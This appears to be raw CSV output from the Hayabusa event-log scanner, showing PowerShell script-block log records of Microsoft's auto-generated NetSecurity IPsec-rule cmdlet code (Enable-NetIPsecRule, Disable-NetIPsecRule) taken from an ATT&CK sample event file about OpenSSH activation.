[Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, 
[Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if 
($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') 
-and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if 
($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 
'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' -Alias '*' function Disable-NetIPsecRule { 
[CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] 
${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] 
${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Manage",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 10:19:38.081 +00:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and 